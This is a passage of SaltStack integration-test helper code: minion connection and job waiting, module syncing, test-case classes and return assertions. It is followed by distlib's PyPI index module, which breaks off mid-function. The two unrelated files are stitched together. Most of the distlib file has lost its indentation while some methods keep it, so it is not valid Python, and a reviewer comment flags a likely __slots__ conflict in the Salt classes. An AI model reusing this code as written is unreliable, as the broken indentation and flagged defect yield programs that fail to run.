        # Prepend the mock binaries dir to PATH (idempotent).
        path = os.environ.get('PATH', '')
        path_items = path.split(os.pathsep)
        if MOCKBIN not in path_items:
            path_items.insert(0, MOCKBIN)
        os.environ['PATH'] = os.pathsep.join(path_items)

    def _exit_mockbin(self):
        # Undo _enter_mockbin; tolerate MOCKBIN already being gone.
        path = os.environ.get('PATH', '')
        path_items = path.split(os.pathsep)
        try:
            path_items.remove(MOCKBIN)
        except ValueError:
            pass
        os.environ['PATH'] = os.pathsep.join(path_items)

    def _clean(self):
        '''
        Clean out the tmp files
        '''
        if not self.parser.options.clean:
            return
        if os.path.isdir(self.sub_minion_opts['root_dir']):
            shutil.rmtree(self.sub_minion_opts['root_dir'])
        if os.path.isdir(self.master_opts['root_dir']):
            shutil.rmtree(self.master_opts['root_dir'])
        if os.path.isdir(self.smaster_opts['root_dir']):
            shutil.rmtree(self.smaster_opts['root_dir'])

        for dirname in (TMP, TMP_STATE_TREE, TMP_PRODENV_STATE_TREE):
            if os.path.isdir(dirname):
                shutil.rmtree(dirname)

    def wait_for_jid(self, targets, jid, timeout=120):
        '''
        Poll saltutil.running until job *jid* is done on all *targets*;
        return True when finished, False once *timeout* seconds elapse.
        '''
        time.sleep(1)  # Allow some time for minions to accept jobs
        now = datetime.now()
        expire = now + timedelta(seconds=timeout)
        job_finished = False
        while now <= expire:
            running = self.__client_job_running(targets, jid)
            sys.stdout.write(
                '\r{0}\r'.format(
                    ' ' * getattr(self.parser.options, 'output_columns', PNUM)
                )
            )
            if not running and job_finished is False:
                # Let's not have false positives and wait one more second
                job_finished = True
            elif not running and job_finished is True:
                return True
            elif running and job_finished is True:
                job_finished = False

            if job_finished is False:
                sys.stdout.write(
                    ' * {YELLOW}[Quit in {0}]{ENDC} Waiting for {1}'.format(
                        '{0}'.format(expire - now).rsplit('.', 1)[0],
                        ', '.join(running),
                        **self.colors
                    )
                )
                sys.stdout.flush()
            time.sleep(1)
            now = datetime.now()
        else:  # pylint: disable=W0120
            sys.stdout.write(
                '\n {RED_BOLD}*{ENDC} ERROR: Failed to get information '
                'back\n'.format(**self.colors)
            )
            sys.stdout.flush()
        return False

    def __client_job_running(self, targets, jid):
        # Return the subset of *targets* still running job *jid*.
        running = self.client.cmd(
            list(targets), 'saltutil.running', expr_form='list'
        )
        return [
            k for (k, v) in running.iteritems() if v and v[0]['jid'] == jid
        ]

    def wait_for_minion_connections(self, targets, timeout):
        '''
        Block until every minion in *targets* answers test.ping, or abort
        the whole run (SystemExit) once *timeout* seconds elapse.
        '''
        sys.stdout.write(
            ' {LIGHT_BLUE}*{ENDC} Waiting at most {0} for minions({1}) to '
            'connect back\n'.format(
                (timeout > 60 and
                 timedelta(seconds=timeout) or
                 '{0} secs'.format(timeout)),
                ', '.join(targets),
                **self.colors
            )
        )
        sys.stdout.flush()
        expected_connections = set(targets)
        now = datetime.now()
        expire = now + timedelta(seconds=timeout)
        while now <= expire:
            sys.stdout.write(
                '\r{0}\r'.format(
                    ' ' * getattr(self.parser.options, 'output_columns', PNUM)
                )
            )
            sys.stdout.write(
                ' * {YELLOW}[Quit in {0}]{ENDC} Waiting for {1}'.format(
                    '{0}'.format(expire - now).rsplit('.', 1)[0],
                    ', '.join(expected_connections),
                    **self.colors
                )
            )
            sys.stdout.flush()
            responses = self.client.cmd(
                list(expected_connections), 'test.ping', expr_form='list',
            )
            for target in responses:
                if target not in expected_connections:
                    # Someone(minion) else "listening"?
                    continue
                expected_connections.remove(target)
                sys.stdout.write(
                    '\r{0}\r'.format(
                        ' ' * getattr(self.parser.options, 'output_columns',
                                      PNUM)
                    )
                )
                sys.stdout.write(
                    ' {LIGHT_GREEN}*{ENDC} {0} connected.\n'.format(
                        target, **self.colors
                    )
                )
                sys.stdout.flush()

            if not expected_connections:
                return

            time.sleep(1)
            now = datetime.now()
        else:  # pylint: disable=W0120
            print(
                '\n {RED_BOLD}*{ENDC} WARNING: Minions failed to connect '
                'back. Tests requiring them WILL fail'.format(**self.colors)
            )
            try:
                print_header(
                    '=', sep='=', inline=True,
                    width=getattr(self.parser.options, 'output_columns', PNUM)
                )
            except TypeError:
                print_header('=', sep='=', inline=True)
            raise SystemExit()

    def sync_minion_modules_(self, modules_kind, targets, timeout=None):
        '''
        Run saltutil.sync_<modules_kind> on *targets* and wait until every
        minion reports back; return True on success, False on error.
        '''
        if not timeout:
            timeout = 120
        # Let's sync all connected minions
        print(
            ' {LIGHT_BLUE}*{ENDC} Syncing minion\'s {1} '
            '(saltutil.sync_{1})'.format(
                ', '.join(targets),
                modules_kind,
                **self.colors
            )
        )
        syncing = set(targets)
        jid_info = self.client.run_job(
            list(targets), 'saltutil.sync_{0}'.format(modules_kind),
            expr_form='list',
            timeout=9999999999999999,
        )

        if self.wait_for_jid(targets, jid_info['jid'], timeout) is False:
            print(
                ' {RED_BOLD}*{ENDC} WARNING: Minions failed to sync {0}. '
                'Tests requiring these {0} WILL fail'.format(
                    modules_kind, **self.colors)
            )
            raise SystemExit()

        while syncing:
            rdata = self.client.get_full_returns(jid_info['jid'], syncing, 1)
            if rdata:
                for name, output in rdata.iteritems():
                    if not output['ret']:
                        # Already synced!?
                        syncing.remove(name)
                        continue

                    if isinstance(output['ret'], salt._compat.string_types):
                        # An error has occurred
                        # BUG FIX: message used to read "Failed so sync".
                        print(
                            ' {RED_BOLD}*{ENDC} {0} Failed to sync {2}: '
                            '{1}'.format(
                                name, output['ret'],
                                modules_kind,
                                **self.colors)
                        )
                        return False
                    print(
                        ' {LIGHT_GREEN}*{ENDC} Synced {0} {2}: '
                        '{1}'.format(
                            name,
                            ', '.join(output['ret']),
                            modules_kind, **self.colors
                        )
                    )
                    # Synced!
                    try:
                        syncing.remove(name)
                    except KeyError:
                        print(
                            ' {RED_BOLD}*{ENDC} {0} already synced??? '
                            '{1}'.format(name, output, **self.colors)
                        )
        return True

    def sync_minion_states(self, targets, timeout=None):
        '''Sync the suite's custom state modules to *targets*.'''
        self.sync_minion_modules_('states', targets, timeout=timeout)

    def sync_minion_modules(self, targets, timeout=None):
        '''Sync the suite's custom execution modules to *targets*.'''
        self.sync_minion_modules_('modules', targets, timeout=timeout)
class AdaptedConfigurationTestCaseMixIn(object):
    '''
    Mix-in that rewrites the bundled integration config files so their
    `user` setting matches the (non-root) user running the test suite.
    '''

    __slots__ = ()

    def get_config_dir(self):
        '''
        Return a directory of adapted config files (TMP_CONF_DIR), or the
        pristine integration config dir when running as root.
        '''
        integration_config_dir = os.path.join(
            INTEGRATION_TEST_DIR, 'files', 'conf'
        )
        if os.getuid() == 0:
            # Running as root, the running user does not need to be updated
            return integration_config_dir

        for triplet in os.walk(integration_config_dir):
            partial = triplet[0].replace(integration_config_dir, "")[1:]
            for fname in triplet[2]:
                if fname.startswith(('.', '_')):
                    continue
                # Side effect: materializes the adapted copy under
                # TMP_CONF_DIR so the returned directory is complete.
                self.get_config_file_path(os.path.join(partial, fname))
        return TMP_CONF_DIR

    def get_config_file_path(self, filename):
        '''
        Return the path of the (possibly user-adapted) config file *filename*,
        creating the adapted copy on first access.
        '''
        integration_config_file = os.path.join(
            INTEGRATION_TEST_DIR, 'files', 'conf', filename
        )
        if os.getuid() == 0:
            # Running as root, the running user does not need to be updated
            return integration_config_file

        updated_config_path = os.path.join(TMP_CONF_DIR, filename)
        partial = os.path.dirname(updated_config_path)
        if not os.path.isdir(partial):
            os.makedirs(partial)

        if not os.path.isfile(updated_config_path):
            self.__update_config(integration_config_file, updated_config_path)
        return updated_config_path

    def __update_config(self, source, dest):
        # Copy *source* to *dest* with `user` rewritten to the current user.
        if not os.path.isfile(dest):
            running_tests_user = pwd.getpwuid(os.getuid()).pw_name
            # IMPROVED: context managers close the handles promptly, and
            # safe_load is used since these are plain data-only YAML files
            # (yaml.load on arbitrary input can construct Python objects).
            with open(source) as rfh:
                configuration = yaml.safe_load(rfh)
            configuration['user'] = running_tests_user
            with open(dest, 'w') as wfh:
                wfh.write(yaml.dump(configuration))
class SaltClientTestCaseMixIn(AdaptedConfigurationTestCaseMixIn):
    # Name of the config file (under the integration conf dir) used to build
    # the LocalClient; subclasses may override (see SyndicCase).
    _salt_client_config_file_name_ = 'master'
    # NOTE(review): listing 'client' and '_salt_client_config_file_name_' in
    # __slots__ while the same names are also defined as class attributes
    # looks like it would raise "conflicts with class variable" at class
    # creation on CPython -- confirm how this imports cleanly before relying
    # on the slots.
    __slots__ = ('client', '_salt_client_config_file_name_')

    @property
    def client(self):
        # Build a fresh LocalClient per access so it always reflects the
        # user-adapted config file for the running test user.
        return salt.client.LocalClient(
            self.get_config_file_path(self._salt_client_config_file_name_)
        )
class ModuleCase(TestCase, SaltClientTestCaseMixIn):
    '''
    Execute a module function
    '''

    def minion_run(self, _function, *args, **kw):
        '''
        Run a single salt function on the 'minion' target and condition
        the return down to match the behavior of the raw function call
        '''
        return self.run_function(_function, args, **kw)

    def run_function(self, function, arg=(), minion_tgt='minion', timeout=25,
                     **kwargs):
        '''
        Run a single salt function and condition the return down to match the
        behavior of the raw function call
        '''
        # Renamed from the misspelled `know_to_return_none`: functions that
        # legitimately return None, so a None reply is not treated as an
        # error below.
        known_to_return_none = (
            'file.chown', 'file.chgrp', 'ssh.recv_known_host'
        )
        orig = self.client.cmd(
            minion_tgt, function, arg, timeout=timeout, kwarg=kwargs
        )

        if minion_tgt not in orig:
            self.skipTest(
                'WARNING(SHOULD NOT HAPPEN #1935): Failed to get a reply '
                'from the minion \'{0}\'. Command output: {1}'.format(
                    minion_tgt, orig
                )
            )
        elif orig[minion_tgt] is None and function not in known_to_return_none:
            self.skipTest(
                'WARNING(SHOULD NOT HAPPEN #1935): Failed to get \'{0}\' from '
                'the minion \'{1}\'. Command output: {2}'.format(
                    function, minion_tgt, orig
                )
            )

        # Try to match stalled state functions
        orig[minion_tgt] = self._check_state_return(
            orig[minion_tgt], func=function
        )

        return orig[minion_tgt]

    def run_state(self, function, **kwargs):
        '''
        Run the state.single command and return the state return structure
        '''
        ret = self.run_function('state.single', [function], **kwargs)
        return self._check_state_return(ret)

    @property
    def minion_opts(self):
        '''
        Return the options used for the minion
        '''
        return salt.config.minion_config(
            self.get_config_file_path('minion')
        )

    @property
    def sub_minion_opts(self):
        '''
        Return the options used for the sub_minion
        '''
        return salt.config.minion_config(
            self.get_config_file_path('sub_minion')
        )

    @property
    def master_opts(self):
        '''
        Return the options used for the master
        '''
        return salt.config.master_config(
            self.get_config_file_path('master')
        )

    def _check_state_return(self, ret, func='state.single'):
        '''
        Detect the "function is running as PID ..." state-lock error in a
        list-shaped return, kill the offending job(s), and annotate the
        return. Dict returns (the normal state format) pass through as-is.
        (`func` is kept for interface compatibility; it is not used here.)
        '''
        if isinstance(ret, dict):
            # This is the supposed return format for state calls
            return ret

        if isinstance(ret, list):
            jids = []
            # These are usually errors
            for item in ret[:]:
                if not isinstance(item, salt._compat.string_types):
                    # We don't know how to handle this
                    continue
                match = STATE_FUNCTION_RUNNING_RE.match(item)
                if not match:
                    # We don't know how to handle this
                    continue
                jid = match.group('jid')
                if jid in jids:
                    continue

                jids.append(jid)
                job_data = self.run_function(
                    'saltutil.find_job', [jid]
                )
                job_kill = self.run_function('saltutil.kill_job', [jid])

                msg = (
                    'A running state.single was found causing a state lock. '
                    'Job details: {0!r} Killing Job Returned: {1!r}'.format(
                        job_data, job_kill
                    )
                )
                ret.append('[TEST SUITE ENFORCED]{0}'
                           '[/TEST SUITE ENFORCED]'.format(msg))
        return ret
class SyndicCase(TestCase, SaltClientTestCaseMixIn):
    '''
    Execute a syndic based execution test
    '''
    # Route the LocalClient through the syndic master configuration.
    _salt_client_config_file_name_ = 'syndic_master'

    def run_function(self, function, arg=()):
        '''
        Run a single salt function and condition the return down to match the
        behavior of the raw function call
        '''
        ret = self.client.cmd('minion', function, arg, timeout=25)
        if 'minion' not in ret:
            # The minion never answered through the syndic; treat it as an
            # environment problem rather than a test failure.
            self.skipTest(
                'WARNING(SHOULD NOT HAPPEN #1935): Failed to get a reply '
                'from the minion. Command output: {0}'.format(ret)
            )
        return ret['minion']
class ShellCase(AdaptedConfigurationTestCaseMixIn, ShellTestCase):
    '''
    Execute a test for a shell command
    '''

    _code_dir_ = CODE_DIR
    _script_dir_ = SCRIPT_DIR
    _python_executable_ = PYEXEC

    def _prepend_config_dir(self, flag, arg_str):
        # Build '<flag> <config dir> <rest of args>' for the CLI scripts.
        return '{0} {1} {2}'.format(flag, self.get_config_dir(), arg_str)

    def run_salt(self, arg_str, with_retcode=False, catch_stderr=False):
        '''
        Execute salt
        '''
        return self.run_script(
            'salt',
            self._prepend_config_dir('-c', arg_str),
            with_retcode=with_retcode,
            catch_stderr=catch_stderr,
        )

    def run_run(self, arg_str, with_retcode=False, catch_stderr=False):
        '''
        Execute salt-run
        '''
        return self.run_script(
            'salt-run',
            self._prepend_config_dir('-c', arg_str),
            with_retcode=with_retcode,
            catch_stderr=catch_stderr,
        )

    def run_run_plus(self, fun, options='', *arg, **kwargs):
        '''
        Execute Salt run and the salt run function and return the data from
        each in a dict
        '''
        ret = {}
        # First drive the CLI runner...
        ret['out'] = self.run_run(
            '{0} {1} {2}'.format(options, fun, ' '.join(arg)),
            catch_stderr=kwargs.get('catch_stderr', None)
        )
        # ...then call the same runner function through the Python API.
        opts = salt.config.master_config(self.get_config_file_path('master'))
        opts.update({'doc': False, 'fun': fun, 'arg': arg})
        with RedirectStdStreams():
            ret['fun'] = salt.runner.Runner(opts).run()
        return ret

    def run_key(self, arg_str, catch_stderr=False, with_retcode=False):
        '''
        Execute salt-key
        '''
        return self.run_script(
            'salt-key',
            self._prepend_config_dir('-c', arg_str),
            catch_stderr=catch_stderr,
            with_retcode=with_retcode
        )

    def run_cp(self, arg_str, with_retcode=False, catch_stderr=False):
        '''
        Execute salt-cp
        '''
        return self.run_script(
            'salt-cp',
            self._prepend_config_dir('--config-dir', arg_str),
            with_retcode=with_retcode,
            catch_stderr=catch_stderr,
        )

    def run_call(self, arg_str, with_retcode=False, catch_stderr=False):
        '''
        Execute salt-call
        '''
        return self.run_script(
            'salt-call',
            self._prepend_config_dir('--config-dir', arg_str),
            with_retcode=with_retcode,
            catch_stderr=catch_stderr,
        )

    def run_cloud(self, arg_str, catch_stderr=False, timeout=None):
        '''
        Execute salt-cloud
        '''
        return self.run_script(
            'salt-cloud',
            self._prepend_config_dir('-c', arg_str),
            catch_stderr, timeout
        )
class ShellCaseCommonTestsMixIn(CheckShellBinaryNameAndVersionMixIn):

    # Every salt CLI binary is expected to report the package version.
    _call_binary_expected_version_ = salt.__version__

    def test_salt_with_git_version(self):
        # Verify that '--version' output matches `git describe` when the
        # test suite runs from a git checkout; skipped otherwise.
        if getattr(self, '_call_binary_', None) is None:
            self.skipTest('\'_call_binary_\' not defined.')
        from salt.utils import which
        from salt.version import __version_info__, SaltStackVersion
        git = which('git')
        if not git:
            self.skipTest('The git binary is not available')
        # Let's get the output of git describe
        process = subprocess.Popen(
            [git, 'describe', '--tags', '--match', 'v[0-9]*'],
            stdout=subprocess.PIPE,
            stderr=subprocess.PIPE,
            close_fds=True,
            cwd=CODE_DIR
        )
        out, err = process.communicate()
        if not out:
            # Not a git checkout (or no matching tags): nothing to compare.
            self.skipTest(
                'Failed to get the output of \'git describe\'. '
                'Error: {0!r}'.format(
                    err
                )
            )
        parsed_version = SaltStackVersion.parse(out)
        if parsed_version.info < __version_info__:
            self.skipTest(
                'We\'re likely about to release a new version. This test '
                'would fail. Parsed({0!r}) < Expected({1!r})'.format(
                    parsed_version.info, __version_info__
                )
            )
        elif parsed_version.info != __version_info__:
            self.skipTest(
                'In order to get the proper salt version with the '
                'git hash you need to update salt\'s local git '
                'tags. Something like: \'git fetch --tags\' or '
                '\'git fetch --tags upstream\' if you followed '
                'salt\'s contribute documentation. The version '
                'string WILL NOT include the git hash.'
            )
        out = '\n'.join(self.run_script(self._call_binary_, '--version'))
        self.assertIn(parsed_version.string, out)
class SaltReturnAssertsMixIn(object):
    '''
    Assertion helpers for inspecting salt call/state return structures
    (dictionaries keyed by minion id).
    '''

    def assertReturnSaltType(self, ret):
        # Salt function/state returns are expected to be dictionaries.
        try:
            self.assertTrue(isinstance(ret, dict))
        except AssertionError:
            raise AssertionError(
                '{0} is not dict. Salt returned: {1}'.format(
                    type(ret).__name__, ret
                )
            )

    def assertReturnNonEmptySaltType(self, ret):
        self.assertReturnSaltType(ret)
        try:
            self.assertNotEqual(ret, {})
        except AssertionError:
            # BUG FIX: the original raised the raw template string without
            # ever calling .format(), leaving the '{}' placeholders unfilled.
            raise AssertionError(
                '{0} is equal to {1}. Salt returned an empty '
                'dictionary.'.format(ret, {})
            )

    def __return_valid_keys(self, keys):
        '''
        Normalize ``keys`` into a list of key names; raise on other types.
        '''
        if isinstance(keys, tuple):
            # If it's a tuple, turn it into a list
            keys = list(keys)
        elif isinstance(keys, basestring):
            # If it's a basestring , make it a one item list
            keys = [keys]
        elif not isinstance(keys, list):
            # If we've reached here, it's a bad type passed to keys
            raise RuntimeError('The passed keys need to be a list')
        return keys

    def __getWithinSaltReturn(self, ret, keys):
        '''
        Drill down through each minion's return following ``keys`` and
        return the value found in the last minion entry processed.
        '''
        self.assertReturnNonEmptySaltType(ret)
        keys = self.__return_valid_keys(keys)
        ret_item = None
        for part in ret.itervalues():
            # BUG FIX: the key queue is now reset per minion entry; it was
            # previously shared, so with multiple minions the lookup popped
            # the wrong keys from the second entry onwards.
            okeys = keys[:]
            try:
                ret_item = part[okeys.pop(0)]
            except (KeyError, TypeError):
                raise AssertionError(
                    'Could not get ret{0} from salt\'s return: {1}'.format(
                        ''.join(['[{0!r}]'.format(k) for k in keys]), part
                    )
                )
            while okeys:
                try:
                    ret_item = ret_item[okeys.pop(0)]
                except (KeyError, TypeError):
                    raise AssertionError(
                        'Could not get ret{0} from salt\'s return: {1}'.format(
                            ''.join(['[{0!r}]'.format(k) for k in keys]), part
                        )
                    )
        return ret_item

    def assertSaltTrueReturn(self, ret):
        try:
            self.assertTrue(self.__getWithinSaltReturn(ret, 'result'))
        except AssertionError:
            log.info('Salt Full Return:\n{0}'.format(pprint.pformat(ret)))
            try:
                raise AssertionError(
                    '{result} is not True. Salt Comment:\n{comment}'.format(
                        **(ret.values()[0])
                    )
                )
            except (AttributeError, IndexError):
                raise AssertionError(
                    'Failed to get result. Salt Returned:\n{0}'.format(
                        pprint.pformat(ret)
                    )
                )

    def assertSaltFalseReturn(self, ret):
        try:
            self.assertFalse(self.__getWithinSaltReturn(ret, 'result'))
        except AssertionError:
            log.info('Salt Full Return:\n{0}'.format(pprint.pformat(ret)))
            try:
                raise AssertionError(
                    '{result} is not False. Salt Comment:\n{comment}'.format(
                        **(ret.values()[0])
                    )
                )
            except (AttributeError, IndexError):
                raise AssertionError(
                    'Failed to get result. Salt Returned: {0}'.format(ret)
                )

    def assertSaltNoneReturn(self, ret):
        try:
            self.assertIsNone(self.__getWithinSaltReturn(ret, 'result'))
        except AssertionError:
            log.info('Salt Full Return:\n{0}'.format(pprint.pformat(ret)))
            try:
                raise AssertionError(
                    '{result} is not None. Salt Comment:\n{comment}'.format(
                        **(ret.values()[0])
                    )
                )
            except (AttributeError, IndexError):
                raise AssertionError(
                    'Failed to get result. Salt Returned: {0}'.format(ret)
                )

    def assertInSaltComment(self, in_comment, ret):
        return self.assertIn(
            in_comment, self.__getWithinSaltReturn(ret, 'comment')
        )

    def assertNotInSaltComment(self, not_in_comment, ret):
        return self.assertNotIn(
            not_in_comment, self.__getWithinSaltReturn(ret, 'comment')
        )

    def assertSaltCommentRegexpMatches(self, ret, pattern):
        return self.assertInSaltReturnRegexpMatches(ret, pattern, 'comment')

    def assertInSaltStateWarning(self, in_comment, ret):
        return self.assertIn(
            in_comment, self.__getWithinSaltReturn(ret, 'warnings')
        )

    # Backwards-compatible alias: the original name is misspelled but may
    # already be used by existing test code.
    assertInSalStatetWarning = assertInSaltStateWarning

    def assertNotInSaltStateWarning(self, not_in_comment, ret):
        return self.assertNotIn(
            not_in_comment, self.__getWithinSaltReturn(ret, 'warnings')
        )

    def assertInSaltReturn(self, item_to_check, ret, keys):
        return self.assertIn(
            item_to_check, self.__getWithinSaltReturn(ret, keys)
        )

    def assertNotInSaltReturn(self, item_to_check, ret, keys):
        return self.assertNotIn(
            item_to_check, self.__getWithinSaltReturn(ret, keys)
        )

    def assertInSaltReturnRegexpMatches(self, ret, pattern, keys=()):
        return self.assertRegexpMatches(
            self.__getWithinSaltReturn(ret, keys), pattern
        )

    def assertSaltStateChangesEqual(self, ret, comparison, keys=()):
        keys = ['changes'] + self.__return_valid_keys(keys)
        return self.assertEqual(
            self.__getWithinSaltReturn(ret, keys), comparison
        )

    def assertSaltStateChangesNotEqual(self, ret, comparison, keys=()):
        keys = ['changes'] + self.__return_valid_keys(keys)
        return self.assertNotEqual(
            self.__getWithinSaltReturn(ret, keys), comparison
        )
class ClientCase(AdaptedConfigurationTestCaseMixIn, TestCase):
    '''
    A base class containing relevant options for starting the various Salt
    Python API entrypoints
    '''

    def get_opts(self):
        # Client configuration is always derived from the master config.
        return salt.config.client_config(self.get_config_file_path('master'))

    def mkdir_p(self, path):
        # Emulate `mkdir -p`: a pre-existing directory is not an error.
        try:
            os.makedirs(path)
        except OSError as exc:  # Python >2.5
            if exc.errno != errno.EEXIST or not os.path.isdir(path):
                raise
|
index.py | # -*- coding: utf-8 -*-
#
# Copyright (C) 2013 Vinay Sajip.
# Licensed to the Python Software Foundation under a contributor agreement.
# See LICENSE.txt and CONTRIBUTORS.txt.
#
import hashlib
import logging
import os
import shutil
import subprocess
import tempfile
try:
from threading import Thread
except ImportError:
from dummy_threading import Thread
from . import DistlibException
from .compat import (HTTPBasicAuthHandler, Request, HTTPPasswordMgr,
urlparse, build_opener, string_types)
from .util import cached_property, zip_dir, ServerProxy
logger = logging.getLogger(__name__)
DEFAULT_INDEX = 'https://pypi.python.org/pypi'
DEFAULT_REALM = 'pypi'
class PackageIndex(object):
"""
This class represents a package index compatible with PyPI, the Python
Package Index.
"""
boundary = b'----------ThIs_Is_tHe_distlib_index_bouNdaRY_$'
def __init__(self, url=None):
"""
Initialise an instance.
:param url: The URL of the index. If not specified, the URL for PyPI is
used.
"""
self.url = url or DEFAULT_INDEX
self.read_configuration()
scheme, netloc, path, params, query, frag = urlparse(self.url)
if params or query or frag or scheme not in ('http', 'https'):
raise DistlibException('invalid repository: %s' % self.url)
self.password_handler = None
self.ssl_verifier = None
self.gpg = None
self.gpg_home = None
self.rpc_proxy = None
with open(os.devnull, 'w') as sink:
# Use gpg by default rather than gpg2, as gpg2 insists on
# prompting for passwords
for s in ('gpg', 'gpg2'):
try:
rc = subprocess.check_call([s, '--version'], stdout=sink,
stderr=sink)
if rc == 0:
self.gpg = s
break
except OSError:
pass
def _get_pypirc_command(self):
"""
Get the distutils command for interacting with PyPI configurations.
:return: the command.
"""
from distutils.core import Distribution
from distutils.config import PyPIRCCommand
d = Distribution()
return PyPIRCCommand(d)
def read_configuration(self):
"""
Read the PyPI access configuration as supported by distutils, getting
PyPI to do the actual work. This populates ``username``, ``password``,
``realm`` and ``url`` attributes from the configuration.
"""
# get distutils to do the work
c = self._get_pypirc_command()
c.repository = self.url
cfg = c._read_pypirc()
self.username = cfg.get('username')
self.password = cfg.get('password')
self.realm = cfg.get('realm', 'pypi')
self.url = cfg.get('repository', self.url)
def save_configuration(self):
"""
Save the PyPI access configuration. You must have set ``username`` and
``password`` attributes before calling this method.
Again, distutils is used to do the actual work.
"""
self.check_credentials()
# get distutils to do the work
c = self._get_pypirc_command()
c._store_pypirc(self.username, self.password)
def check_credentials(self):
"""
Check that ``username`` and ``password`` have been set, and raise an
exception if not.
"""
if self.username is None or self.password is None:
raise DistlibException('username and password must be set')
pm = HTTPPasswordMgr()
_, netloc, _, _, _, _ = urlparse(self.url)
pm.add_password(self.realm, netloc, self.username, self.password)
self.password_handler = HTTPBasicAuthHandler(pm)
def register(self, metadata):
"""
Register a distribution on PyPI, using the provided metadata.
:param metadata: A :class:`Metadata` instance defining at least a name
and version number for the distribution to be
registered.
:return: The HTTP response received from PyPI upon submission of the
request.
"""
self.check_credentials()
metadata.validate()
d = metadata.todict()
d[':action'] = 'verify'
request = self.encode_request(d.items(), [])
response = self.send_request(request)
d[':action'] = 'submit'
request = self.encode_request(d.items(), [])
return self.send_request(request)
def _reader(self, name, stream, outbuf):
"""
Thread runner for reading lines of from a subprocess into a buffer.
:param name: The logical name of the stream (used for logging only).
:param stream: The stream to read from. This will typically a pipe
connected to the output stream of a subprocess.
:param outbuf: The list to append the read lines to.
"""
while True:
s = stream.readline()
if not s:
break
s = s.decode('utf-8').rstrip()
outbuf.append(s)
logger.debug('%s: %s' % (name, s))
stream.close()
def get_sign_command(self, filename, signer, sign_password,
keystore=None):
"""
Return a suitable command for signing a file.
:param filename: The pathname to the file to be signed.
:param signer: The identifier of the signer of the file.
:param sign_password: The passphrase for the signer's
private key used for signing.
:param keystore: The path to a directory which contains the keys
used in verification. If not specified, the
instance's ``gpg_home`` attribute is used instead.
:return: The signing command as a list suitable to be
passed to :class:`subprocess.Popen`.
"""
cmd = [self.gpg, '--status-fd', '2', '--no-tty']
if keystore is None:
keystore = self.gpg_home
if keystore:
cmd.extend(['--homedir', keystore])
if sign_password is not None:
cmd.extend(['--batch', '--passphrase-fd', '0'])
td = tempfile.mkdtemp()
sf = os.path.join(td, os.path.basename(filename) + '.asc')
cmd.extend(['--detach-sign', '--armor', '--local-user',
signer, '--output', sf, filename])
logger.debug('invoking: %s', ' '.join(cmd))
return cmd, sf
    def run_command(self, cmd, input_data=None):
        """
        Run a command in a child process , passing it any input data specified.

        :param cmd: The command to run.
        :param input_data: If specified, this must be a byte string containing
                           data to be sent to the child process.
        :return: A tuple consisting of the subprocess' exit code, a list of
                 lines read from the subprocess' ``stdout``, and a list of
                 lines read from the subprocess' ``stderr``.
        """
        kwargs = {
            'stdout': subprocess.PIPE,
            'stderr': subprocess.PIPE,
        }
        if input_data is not None:
            kwargs['stdin'] = subprocess.PIPE
        stdout = []
        stderr = []
        p = subprocess.Popen(cmd, **kwargs)
        # We don't use communicate() here because we may need to
        # get clever with interacting with the command
        # Drain stdout/stderr on separate threads so neither pipe fills up
        # and blocks the child while we wait for it.
        t1 = Thread(target=self._reader, args=('stdout', p.stdout, stdout))
        t1.start()
        t2 = Thread(target=self._reader, args=('stderr', p.stderr, stderr))
        t2.start()
        if input_data is not None:
            # Send the input and close stdin so the child sees EOF.
            p.stdin.write(input_data)
            p.stdin.close()
        p.wait()
        # Join the reader threads so the output lists are complete.
        t1.join()
        t2.join()
        return p.returncode, stdout, stderr
def sign_file(self, filename, signer, sign_password, keystore=None):
"""
Sign a file.
:param filename: The pathname to the file to be signed.
:param signer: The identifier of the signer of the file.
:param sign_password: The passphrase for the signer's
private key used for signing.
:param keystore: The path to a directory which contains the keys
used in signing. If not specified, the instance's
``gpg_home`` attribute is used instead.
:return: The absolute pathname of the file where the signature is
stored.
"""
cmd, sig_file = self.get_sign_command(filename, signer, sign_password,
keystore)
rc, stdout, stderr = self.run_command(cmd,
sign_password.encode('utf-8'))
if rc != 0:
raise DistlibException('sign command failed with error '
'code %s' % rc)
return sig_file
    def upload_file(self, metadata, filename, signer=None, sign_password=None,
                    filetype='sdist', pyversion='source', keystore=None):
        """
        Upload a release file to the index.

        :param metadata: A :class:`Metadata` instance defining at least a name
                         and version number for the file to be uploaded.
        :param filename: The pathname of the file to be uploaded.
        :param signer: The identifier of the signer of the file.
        :param sign_password: The passphrase for the signer's
                              private key used for signing.
        :param filetype: The type of the file being uploaded. This is the
                         distutils command which produced that file, e.g.
                         ``sdist`` or ``bdist_wheel``.
        :param pyversion: The version of Python which the release relates
                          to. For code compatible with any Python, this would
                          be ``source``, otherwise it would be e.g. ``3.2``.
        :param keystore: The path to a directory which contains the keys
                         used in signing. If not specified, the instance's
                         ``gpg_home`` attribute is used instead.
        :return: The HTTP response received from PyPI upon submission of the
                 request.
        """
        self.check_credentials()
        if not os.path.exists(filename):
            raise DistlibException('not found: %s' % filename)
        metadata.validate()
        d = metadata.todict()
        sig_file = None
        if signer:
            if not self.gpg:
                # Signing requested but no gpg binary was found at __init__.
                logger.warning('no signing program available - not signed')
            else:
                sig_file = self.sign_file(filename, signer, sign_password,
                                          keystore)
        with open(filename, 'rb') as f:
            file_data = f.read()
        # Both digests accompany the upload so the index can verify it.
        md5_digest = hashlib.md5(file_data).hexdigest()
        sha256_digest = hashlib.sha256(file_data).hexdigest()
        d.update({
            ':action': 'file_upload',
            'protocol_version': '1',
            'filetype': filetype,
            'pyversion': pyversion,
            'md5_digest': md5_digest,
            'sha256_digest': sha256_digest,
        })
        files = [('content', os.path.basename(filename), file_data)]
        if sig_file:
            with open(sig_file, 'rb') as f:
                sig_data = f.read()
            files.append(('gpg_signature', os.path.basename(sig_file),
                          sig_data))
            # The signature lived in a throwaway temp dir (get_sign_command);
            # remove it now that its content is in memory.
            shutil.rmtree(os.path.dirname(sig_file))
        request = self.encode_request(d.items(), files)
        return self.send_request(request)
def upload_documentation(self, metadata, doc_dir):
"""
Upload documentation to the index.
:param metadata: A :class:`Metadata` instance defining at least a name
and version number for the documentation to be
uploaded.
:param doc_dir: The pathname of the directory which contains the
documentation. This should be the directory that
contains the ``base.html`` for the documentation.
:return: The HTTP response received from PyPI upon submission of the
request.
"""
self.check_credentials()
if not os.path.isdir(doc_dir):
raise DistlibException('not a directory: %r' % doc_dir)
fn = os.path.join(doc_dir, 'base.html')
if not os.path.exists(fn):
raise DistlibException('not found: %r' % fn)
metadata.validate()
name, version = metadata.name, metadata.version
zip_data = zip_dir(doc_dir).getvalue()
fields = [(':action', 'doc_upload'),
